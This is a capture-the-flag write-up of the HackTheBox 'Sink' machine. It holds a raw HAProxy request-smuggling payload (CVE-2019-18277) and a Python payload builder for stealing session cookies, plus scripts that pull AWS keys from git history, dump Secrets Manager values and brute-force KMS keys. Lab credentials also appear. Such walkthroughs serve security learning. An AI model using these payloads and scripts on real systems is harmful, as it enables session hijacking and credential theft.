It's here: a hands-on record of a pentest box challenge

0x00 Challenge introduction

Sink is an Insane-difficulty Linux machine on HackTheBox. I have been doing HackTheBox for a long time, but this was my first Insane box and I learned a lot from it, so I am sharing the process here.


The main knowledge points involved are:

HAProxy HTTP request smuggling (CVE-2019-18277), Git commit log, AWS CLI configure

0x01 Port Scan

└─# nmap -sC -sV -oA sink 10.129.71.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 00:00 CST
Nmap scan report for 10.129.71.3
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=7d01b54d4b74326b; Path=/; HttpOnly
|     Set-Cookie: _csrf=fzBuPyYXciKNMjoU74_PH6UmsMU6MTYyNTUwMDg1NzUxOTkyOTA4OQ; Path=/; Expires=Tue, 06 Jul 2021 16:00:57 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Jul 2021 16:00:57 GMT
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=5a24776cc4ce15ce; Path=/; HttpOnly
|     Set-Cookie: _csrf=Naj5fDxJz0wmhymfl7zrTjDvfrI6MTYyNTUwMDg2NDgyNDg1NDY3MQ; Path=/; Expires=Tue, 06 Jul 2021 16:01:04 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Jul 2021 16:01:04 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops

The interesting ports are 3000 and 5000: port 3000 runs Gitea and port 5000 a site served by Gunicorn. Gitea on 3000 requires a login and we have no credentials yet, so we start with the site on port 5000.

0x02 Port 5000 – Gunicorn

The site on port 5000 allows self-registration. Register a user, log in, and capture the traffic in Burp.

The captured response shows that the stack is HAProxy in front of Gunicorn.

After logging in, the page lets you post comments. A quick search turns up HAProxy HTTP request smuggling (CVE-2019-18277): by smuggling a specially crafted comment request, we can capture private data from other users' HTTP requests.


HAProxy HTTP request smuggling (CVE-2019-18277)

HAProxy has a bug in how it handles the Transfer-Encoding and Content-Length request headers. If a request carries both headers, and the chunked value of Transfer-Encoding is preceded by \x0b or \x0c, HAProxy does not recognise the Transfer-Encoding as chunked, delimits the body by Content-Length, and wrongly forwards the request to the backend with both headers intact. The backend, however, parses the request as chunked, so it considers the request finished as soon as it sees the 0\r\n\r\n terminator. Any Content-Length bytes left over after that terminator stay in the backend connection buffer and become the beginning of the next request processed on that connection.

Request sent to HAProxy:

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding:[\x0b]chunked

0

X

Request as forwarded to the backend (note the X-Forwarded-For header HAProxy adds):

POST / HTTP/1.1
Host: 127.0.0.1:1080
Content-Length: 6
Transfer-Encoding:chunked
X-Forwarded-For: 172.21.0.1

0

X

Exploitation does have preconditions: the HAProxy configuration must contain http-reuse always, so that backend connections are shared between different clients, and the request must carry Connection: keep-alive.

Stealing the admin cookie

Using the HAProxy request smuggling above: if another user sends a request shortly after our crafted one, the smuggled request swallows the beginning of that user's request as its own body and stores it on the site as a comment. Reading that comment afterwards gives us the private parts of the victim's request, such as its Cookie header.


Build the request in Burp Repeater:

POST /comment HTTP/1.1
Host: 10.129.71.3:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://10.129.71.3:5000
Connection: keep-alive
Referer: http://10.129.71.3:5000/home
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Cwo=chunked

8
msg=test
0

POST /comment HTTP/1.1
Host: 10.129.71.3:5000
Cookie: lang=en-US; i_like_gitea=ec51054dc539d89a; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YO2r8w.8rq5TXqG7LkEYJV3cqVwOBTIh7o; _csrf=cQKWFLPhRfTeyypUg38t8RbxoUY6MTYyNjE4ODM1OTEzNDc4OTczMw
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Connection: keep-alive

msg=

The second POST is the smuggled request. Because \x0b has to precede chunked in the Transfer-Encoding value, type Cwo= there, select it in Burp and press Ctrl+Shift+B (Base64 decode); alternatively insert the raw \x0b byte directly in Burp. Two details matter when adapting the request: the chunk size line must be the hex length of the chunk data (8 for msg=test), and the Content-Length values must be correct. HAProxy delimits the outer request by its Content-Length, so that value has to cover everything after the first blank line (Burp updates it automatically unless you have disabled that), while the inner Content-Length has to be larger than its own msg= body so that the backend keeps reading into the victim's request, but not so large that it waits forever for bytes that never arrive. After sending, a new comment appears on the comments page containing the victim's cookie.
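To make the CL.TE desync described above and the cookie-stealing request concrete, here is an added example (not code from the original writeup, and not HAProxy or Gunicorn code). The two framing functions are simplified models: the front end honours Transfer-Encoding only when its value is exactly chunked and otherwise falls back to Content-Length, while the back end tolerates a leading \x0b or \x0c, prefers chunked framing and ignores Content-Length. build_payload() computes the outer Content-Length so that it covers the whole smuggled payload, and simulate() shows what ends up in the smuggled comment once a victim request arrives on the reused back-end connection. The victim request and session values are constructed for the example.

```python
"""Model of the CL.TE desync behind CVE-2019-18277 (added example)."""

CRLF = b"\r\n"


def split_message(raw: bytes):
    """Return (head incl. blank line, {lower-name: value}, body) for one raw request."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete headers")
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        # strip only SP/HTAB: bytes.strip() with no argument would also eat \x0b
        headers[name.strip(b" \t").lower()] = value.strip(b" \t")
    return head + sep, headers, body


def decode_chunked(body: bytes):
    """Decode a chunked body. Returns (decoded data, number of bytes consumed)."""
    pos, out = 0, b""
    while True:
        eol = body.index(CRLF, pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            return out, pos + 2          # skip the empty trailer line
        out += body[pos:pos + size]
        pos += size + 2                  # chunk data plus its CRLF


def frontend_frame(raw: bytes):
    """Front-end model (vulnerable HAProxy): Transfer-Encoding must be exactly
    'chunked' to be honoured; otherwise Content-Length delimits the body.
    Returns (bytes forwarded as one request, bytes left for the next one)."""
    head, headers, body = split_message(raw)
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        _, used = decode_chunked(body)
        return head + body[:used], body[used:]
    length = int(headers.get(b"content-length", b"0"))
    return head + body[:length], body[length:]


def backend_frame(raw: bytes):
    """Back-end model (lenient Gunicorn): drops a leading \\x0b/\\x0c from the
    Transfer-Encoding value and prefers chunked framing over Content-Length.
    Returns (request body, leftover bytes that stay in the connection buffer)."""
    head, headers, body = split_message(raw)
    te = headers.get(b"transfer-encoding", b"").lstrip(b"\x0b\x0c").lower()
    if te == b"chunked":
        data, used = decode_chunked(body)
        return data, body[used:]
    length = int(headers.get(b"content-length", b"0"))
    return body[:length], body[length:]


def build_payload(host: bytes, cookie: bytes, comment: bytes, inner_cl: int) -> bytes:
    """Build the attacker request. The inner POST's Content-Length (inner_cl) is
    larger than its own 'msg=' body so the victim's bytes get appended to it;
    the outer Content-Length is computed to cover the whole smuggled payload."""
    inner = (b"POST /comment HTTP/1.1" + CRLF
             + b"Host: " + host + CRLF
             + b"Cookie: " + cookie + CRLF
             + b"Content-Type: application/x-www-form-urlencoded" + CRLF
             + b"Content-Length: " + str(inner_cl).encode() + CRLF
             + b"Connection: keep-alive" + CRLF + CRLF
             + b"msg=")
    chunked = b"%x" % len(comment) + CRLF + comment + CRLF + b"0" + CRLF + CRLF
    body = chunked + inner
    outer = (b"POST /comment HTTP/1.1" + CRLF
             + b"Host: " + host + CRLF
             + b"Cookie: " + cookie + CRLF
             + b"Content-Type: application/x-www-form-urlencoded" + CRLF
             + b"Content-Length: " + str(len(body)).encode() + CRLF
             + b"Transfer-Encoding: \x0bchunked" + CRLF
             + b"Connection: keep-alive" + CRLF + CRLF)
    return outer + body


def simulate(payload: bytes, victim: bytes):
    """Push the payload through both parsers, then feed the victim's request
    into the same back-end connection (http-reuse always). Returns (body of
    the attacker's own comment, body of the smuggled comment holding victim data)."""
    forwarded, left_at_front = frontend_frame(payload)
    if left_at_front:
        raise ValueError("outer Content-Length does not cover the payload")
    first_body, leftover = backend_frame(forwarded)
    second_body, _ = backend_frame(leftover + victim)
    return first_body, second_body


if __name__ == "__main__":
    # Constructed sample victim request; both session values are made up.
    victim = (b"GET /home HTTP/1.1" + CRLF + b"Host: 10.129.71.3:5000" + CRLF
              + b"Cookie: session=VICTIM_SESSION_VALUE" + CRLF + CRLF)
    payload = build_payload(b"10.129.71.3:5000", b"session=ATTACKER_SESSION",
                            b"msg=test", 4 + len(victim))
    own, stolen = simulate(payload, victim)
    print(own)
    print(stolen)
```

Setting inner_cl to 4 + len(victim) captures the whole victim request; a smaller value truncates it, which is what you want in practice when you only need the Cookie header and do not know the victim's exact request length.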


Swap in the captured session value with Cookie Editor and we are logged in as admin@sink.htb.


Credentials

Three sets of credentials can be found under Notes:

Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

0x03 Port 3000 – Gitea

Trying them out, root / FaH@3L>Z3})zzfQ3 logs into the Gitea instance on port 3000.


Gitea is a self-hosted Git service. Looking through the main repositories, the Key Management repository appears to contain key material.


It is an SSH private key committed by the user marcus.

User - marcus

Copy the private key to the local machine, set its permissions to 600, and ssh in as marcus; the connection succeeds.


An ls in the home directory shows user.txt, the first flag.


0x04 Privilege Escalation

The Key Management repository shows that AWS is in use; likewise, the Log Management repository contains a commit in which marcus removed the AWS key and secret from the configuration.


Following the history back, the earlier commit with the configuration code is:

<?php
require 'vendor/autoload.php';

use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;

$client = new CloudWatchLogsClient([
    'region'      => 'eu',
    'endpoint'    => 'http://127.0.0.1:4566',
    'credentials' => [
        'key'    => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version'     => 'latest'
]);

try {
    $client->createLogGroup(array(
        'logGroupName' => 'Chef_Events',
    ));
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

try {
    $client->createLogStream([
        'logGroupName'  => 'Chef_Events',
        'logStreamName' => '20201120'
    ]);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>
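Instead of clicking through the Gitea history by hand, the same removal commit can be found from the repository's patch log. The scanner below is an added example, not part of the original writeup: it walks `git log -p` output and reports every added or removed line that carries an AWS access key id, together with the commit, file and any 40-character secret on the same line. The sample log is constructed for the example (commit hash, author line, date and file name are made up); the key pair in it is the one recovered from the repository above.

```python
import re
import subprocess

# AWS access key ids are 20 chars starting AKIA/ASIA; secret keys are 40 chars
# of base64-like text. Lookarounds stop matches inside longer tokens.
AWS_ACCESS_KEY = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
AWS_SECRET_KEY = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+]{40}(?![A-Za-z0-9/+=])")


def git_log_patch(repo_path):
    """Return `git log -p --all` for a local clone (all branches, full diffs)."""
    return subprocess.run(["git", "-C", repo_path, "log", "-p", "--all"],
                          capture_output=True, text=True, check=True).stdout


def scan_git_log(log_text):
    """Walk patch output and report every added or removed line holding an AWS
    access key id. Removed lines are the interesting ones: a secret deleted in
    a later commit is still readable in the earlier one."""
    findings = []
    commit = path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            for match in AWS_ACCESS_KEY.finditer(line):
                secret = AWS_SECRET_KEY.search(line)
                findings.append({
                    "commit": commit,
                    "file": path,
                    "action": "removed" if line[0] == "-" else "added",
                    "access_key": match.group(0),
                    "secret": secret.group(0) if secret else None,
                })
    return findings


# Constructed sample of `git log -p` output for a commit like marcus's removal.
SAMPLE_LOG = """\
commit 0000000000000000000000000000000000000001
Author: marcus <marcus@sink.htb>
Date:   Fri Nov 20 00:00:00 2020 +0000

    removed aws key and secret

diff --git a/cloudwatch.php b/cloudwatch.php
--- a/cloudwatch.php
+++ b/cloudwatch.php
@@ -6,7 +6,7 @@
 $client = new CloudWatchLogsClient(['region' => 'eu','endpoint' => 'http://127.0.0.1:4566',
-'credentials' => ['key' => 'AKIAIUEN3QWCPSTEITJQ','secret' => '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'],
+'credentials' => ['key' => '','secret' => ''],
 'version' => 'latest'
"""


if __name__ == "__main__":
    for hit in scan_git_log(SAMPLE_LOG):
        print(f"{hit['commit'][:12]} {hit['file']}: {hit['action']} "
              f"{hit['access_key']} secret={hit['secret']}")
```

Against a real clone, feed `git_log_patch("/path/to/clone")` into `scan_git_log()`; `--all` matters because the secret may only exist on a branch that was never merged.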

AWS CLI Configure

Searching for AWS, key and secret leads to the official CLI documentation: once the CLI is configured with an access key and secret, it can talk to the service and pull sensitive data. The relevant documentation:

docs.aws.amazon.com/cli/latest/…

docs.aws.amazon.com/cli/latest/…


We configure it as documented; only the key and secret need to be changed. The region stands for the AWS region and is set to the value used in the documentation's example:

marcus@sink:~$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddF
Default region name [None]: us-west-2
Default output format [None]: json 

AWS Secrets Manager

Once configured, Secrets Manager can list the stored secrets. The --endpoint-url points the CLI at the local AWS emulation on 127.0.0.1:4566 seen in the PHP code rather than at the real AWS:

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager list-secrets 

Then query each listed secret by its ARN:

aws --endpoint-url="http://127.0.0.1:4566/" secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:xxxxxxx<name>" 

This yields the following:

username: david@sink.htb  password: EALB=bcC=`a7f2#k
username: albert@sink.htb password: Welcome123!
username: john@sink.htb   password: R);\\)ShS99mZ~8j

User - david

Checking /etc/passwd and /home shows that a david user exists, and su david with the password above works.

0x05 AWS Key Management

servers.enc

In david's home directory, /home/david/Projects/Prod_Deployment contains a servers.enc file, which obviously needs to be decrypted.

Since the directory belongs to the Gitea project, the guess is that decryption again goes through AWS; searching turns up AWS Key Management Service (KMS):

docs.aws.amazon.com/kms/latest/…

docs.aws.amazon.com/kms/latest/…

list-keys

As david, configure the AWS CLI the same way as before; afterwards the keys can be listed:

aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys 

decrypt

Following the approach from another writeup, the bash script is:

#!/bin/bash
# Try every key in the account: the keys may be disabled, so enable each one
# first; only the matching asymmetric key decrypts, the others just error out.
for KEY in $(aws --endpoint-url="http://127.0.0.1:4566/" kms list-keys | grep KeyId | awk -F\" '{ print $4 }')
do
    aws --endpoint-url="http://127.0.0.1:4566/" kms enable-key --key-id "${KEY}"
    aws --endpoint-url="http://127.0.0.1:4566/" kms decrypt --key-id "${KEY}" --ciphertext-blob "fileb:///home/david/Projects/Prod_Deployment/servers.enc" --encryption-algorithm "RSAES_OAEP_SHA_256" --output "text" --query "Plaintext"
done

This yields a base64 string (the CLI prints the KMS plaintext base64-encoded). CyberChef is handy for decoding it: just drag in the operations you need:

gchq.github.io/CyberChef/

After base64 decoding, the result still has to be gunzipped, which gives the final credentials:

name: admin
pass: _uezduQ!EY5AHfe2 
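The Secrets Manager enumeration and the KMS key brute force above can also be scripted from Python with boto3 rather than the aws CLI. This is an added example, not code from the original writeup: the endpoint, region and access key pair are the ones the writeup used, while the helper names, the key loop and the gzip post-processing are this example's own. boto3 is imported lazily inside make_client(), so the other helpers can be exercised with any object exposing the same list_secrets/get_secret_value and list_keys/enable_key/decrypt calls.

```python
import base64
import gzip
import sys

ENDPOINT = "http://127.0.0.1:4566/"   # local AWS emulation from the PHP config
REGION = "us-west-2"                  # same value as in `aws configure` above
ACCESS_KEY = "AKIAIUEN3QWCPSTEITJQ"
SECRET_KEY = "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"


def make_client(service, endpoint=ENDPOINT, region=REGION):
    """Real boto3 client pointed at the local endpoint (requires boto3)."""
    import boto3
    return boto3.client(service, endpoint_url=endpoint, region_name=region,
                        aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)


def dump_secrets(sm):
    """list-secrets followed by get-secret-value for each entry, following
    NextToken pagination. Returns {secret name: value}."""
    found, token = {}, None
    while True:
        page = sm.list_secrets(**({"NextToken": token} if token else {}))
        for entry in page.get("SecretList", []):
            value = sm.get_secret_value(SecretId=entry["ARN"])
            # a secret is stored either as text or as binary
            found[entry["Name"]] = value.get("SecretString") or value.get("SecretBinary")
        token = page.get("NextToken")
        if not token:
            return found


def unwrap_plaintext(raw):
    """The CLI prints KMS plaintext base64-encoded (boto3 returns raw bytes);
    servers.enc additionally turned out to be gzip-compressed after decoding,
    so strip whichever of the two layers is present."""
    data = base64.b64decode(raw) if isinstance(raw, str) else raw
    if data[:2] == b"\x1f\x8b":          # gzip magic number
        data = gzip.decompress(data)
    return data


def try_all_keys(kms, ciphertext, algorithm="RSAES_OAEP_SHA_256"):
    """Enable every key in the account and try it against the blob; only the
    matching asymmetric key decrypts, the rest raise. Returns (key id,
    unwrapped plaintext) or None. Follows Marker/Truncated pagination."""
    marker = None
    while True:
        page = kms.list_keys(**({"Marker": marker} if marker else {}))
        for key in page["Keys"]:
            key_id = key["KeyId"]
            try:
                kms.enable_key(KeyId=key_id)
                resp = kms.decrypt(KeyId=key_id, CiphertextBlob=ciphertext,
                                   EncryptionAlgorithm=algorithm)
            except Exception as exc:     # botocore ClientError in practice
                print(f"{key_id}: {type(exc).__name__}", file=sys.stderr)
                continue
            return key_id, unwrap_plaintext(resp["Plaintext"])
        if not page.get("Truncated"):
            return None
        marker = page["NextMarker"]


if __name__ == "__main__":
    for name, value in dump_secrets(make_client("secretsmanager")).items():
        print(f"{name}: {value}")
    if len(sys.argv) > 1:                # e.g. /home/david/Projects/Prod_Deployment/servers.enc
        with open(sys.argv[1], "rb") as fh:
            print(try_all_keys(make_client("kms"), fh.read()))
```

Run it as marcus for the secrets and as david with the path to servers.enc for the key loop; keys that are pending deletion or of the wrong type simply show up on stderr and are skipped.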

done!

Summary

Overall, this box covered HTTP request smuggling via HAProxy (CVE-2019-18277), information leakage through Gitea, AWS CLI configuration and AWS KMS. Anyone who has not worked with AWS before can use this box to get familiar with it. HTTP request smuggling has demanding preconditions, but it is a usable attack technique and worth studying further.
